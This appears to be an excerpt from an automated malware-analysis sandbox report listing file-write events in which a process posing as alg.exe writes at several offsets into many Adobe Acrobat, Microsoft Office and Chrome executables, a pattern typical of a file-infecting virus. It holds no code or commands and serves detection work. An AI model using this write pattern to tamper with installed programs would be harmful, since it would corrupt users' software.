Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 385536	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 959052	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 958976	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 182364	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 123904	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697420	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697344	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 66716	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1102848	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676364	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676288	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 753617	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 2531840	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105356	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105280	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 1150992	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 459776	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033292	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033216	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 209348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 99840	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673356	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673280	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 69527	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 256512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 830028	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 829952	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 72028	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 521216	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094732	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094656	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 321696	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 210944	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784460	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784384	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 126840	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 13312	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586828	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586752	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 2828	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 4785664	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359180	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359104	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 2430581	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 632832	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206272	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 206444	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 2578944	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152460	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152384	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 16859	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 1617920	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191436	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191360	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 860981	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 258048	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831564	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831488	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 82352	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5274624	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848140	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848064	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 3286540	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 185344	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758860	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758784	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 151349	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 26954240	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527756	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527680	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 11401068	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4392960	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966476	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966400	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 2843313	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 1755648	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 2329164	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 2329088	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 740604	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 3347968	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 3921484	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 3921408	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 1777084	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 6470144	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 7043660	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 7043584	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 2807964	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 6470144	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 7043660	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 7043584	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 2807964	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 0	Jump to behavior
